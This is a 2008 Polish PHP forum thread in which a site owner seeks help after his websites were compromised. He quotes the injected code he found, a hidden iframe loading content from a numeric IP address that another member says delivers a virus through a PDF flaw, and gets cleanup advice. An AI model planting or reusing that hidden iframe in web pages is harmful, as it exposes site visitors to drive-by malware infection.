Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

Reply to this topicStart new topic
> [PHP]Bardzo dziwny problem!
-DOmN-
post 2.11.2008, 11:58:59
Post #1

Goście

Otóż mam 3 seriwsy położone na niezależnych seriwsach. Jeden to portal w CMS na cba.pl, drugi to forum phpBB by przemo na yoyo.pl a trzeci to strona w php.

Wczoraj wszystko działało normalnie, nic od dawna zresztą nie robiłem. Dopiero dzisiaj to wyskoczyło.
Portal w CMS na cba.pl. Problem jest taki że jest tylko biały ekran i na dole napis:
Cytat
Darmowy Hosting CBA.PL

Forum na yoyo.pl: Wywala mi:
Cytat
Parse error: syntax error, unexpected '?' in /var/www/sites/yoyo.pl/r/a/raccoons/common.php on line 396

Z kolei ostatni problem to strona w php na płatnym serwerze w Active 24. Niby wszystko działa, ale nad nagłówkiem pojawiła mi się wolna przestrzeń, pod nagłówkiem też. Zerknąłem w kod i pojawiło mi się coś takiego:
Kod
<iframe src="http://66.96.85.221/base/forum2/index.php" width=100 height=80 style="visibility:hidden"></iframe>

Oprócz tego mam taki obiekt gdzie wyświetla mi ostatnie posty z forum i tam widnieje coś takiego:
Kod
Parse error: syntax error, unexpected '<' in /virtual/pl/com/xiaolin-showdown/last.php on line 128

Proszę pilnie o pomoc!
Go to the top of the page
+Quote Post
l0ud
post 2.11.2008, 12:07:53
Post #2

Grupa: Zarejestrowani

Ostrzeżenie: (0%)
-----

To stało się jednocześnie?

Prawdopodobnie masz wirusy na komputerze, bądź łączyłeś się na konta FTP z innego, zawirusowanego komputera. Być może poprzez pirackiego klienta FTP.

W tej chwili najrozsądniejszym wyjściem byłoby przeskanowanie komputera (ew. zmiana klienta ftp), zmiana haseł i wgranie wszystkiego od nowa... A już na pewno przywrócenie poprzednich wersji tych plików, na jakie wskazują błędy.
(to iframe to kod ściągający wirusa przez zapewne jakąś dziurę w pdf'ie)

--------------------
XMPP: l0ud@chrome.pl
+Quote Post
-DOmN-
post 2.11.2008, 12:12:36
Post #3

Goście

Cytat
?<html><body><iframe src="http://66.96.85.221/base/forum2/index.php" width=100 height=80 style="visibility:hidden"></iframe></body></html>>

Przy okazji znalazłem to również na mojej stronie położonej na yoyo.pl.
Największy problem w tym, że na te serwisy na cba.pl i yoyo.pl nie logowałem się od dawna na ftp. To stało się dzisiaj, a dzisiaj nic nie robiłem. Wczoraj wszystko normalnie działało.
Chyba mam wirusa bo co kilka chwil przycina mi się.
+Quote Post
-DOmN-
post 2.11.2008, 14:27:45
Post #4

Goście

Udało mi się na dwóch swoich stronach to naprawić. FTP mam legalnego - Total Commander, mój komp miał parę wirusów, ale już się ich pozbyłem. Tylko że nie mogłem zarazić tych stron na yoyo.pl i cba.pl ponieważ, nie logowałem się na nie od dawna. Najważniejsze że jakoś to naprawiłem. Tylko nadal nie wiem jak to się stało. W podejrzanie miejsca nie wchodzę, wczoraj wieczorem wszystko działało, a dzisiaj rano od razu jak wszedłem...errory.
+Quote Post
l0ud
post 2.11.2008, 15:07:44
Post #5

Grupa: Zarejestrowani

Ostrzeżenie: (0%)
-----

Wirus mógł przy uaktywnieniu ściągnąć hasła zapisane w total commanderze i ich użyć. Mogła go mieć też inna osoba, znająca hasła.

--------------------
XMPP: l0ud@chrome.pl
+Quote Post
-DOmN-
post 2.11.2008, 16:18:19
Post #6

Goście

Tak czy inaczej zmieniłem hasła, chociaż portalu w CMS położonego na cba.pl nadal nie udało mi się naprawić, pewnie dlatego, że nie wiem ile plików zostało zarażonych. Chyba już wiem, jak zaraziłem. Wczoraj chciałem nabić licznik w pewnym miejscu i pootwierałem masę bramek proxy. Pewnie jakaś była zawirusowana.
Wirusów na kompie też się pozbyłem, było kilka zarażonych plików przez jakiegoś trojana i rootkita.
Swoją drogą zauważyłem, bo dla bezpieczeństwa otwierałem te strony w trakcie naprawiania pod Win98 i jak wszedłem na jedną z nich, to chciał pobrać z adresu, który podałem w temacie, plik pdf o tytule license.
Dziękuję za pomoc! guitar.gif
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

RSS Wersja Lo-Fi Aktualny czas: 14.08.2025 - 10:54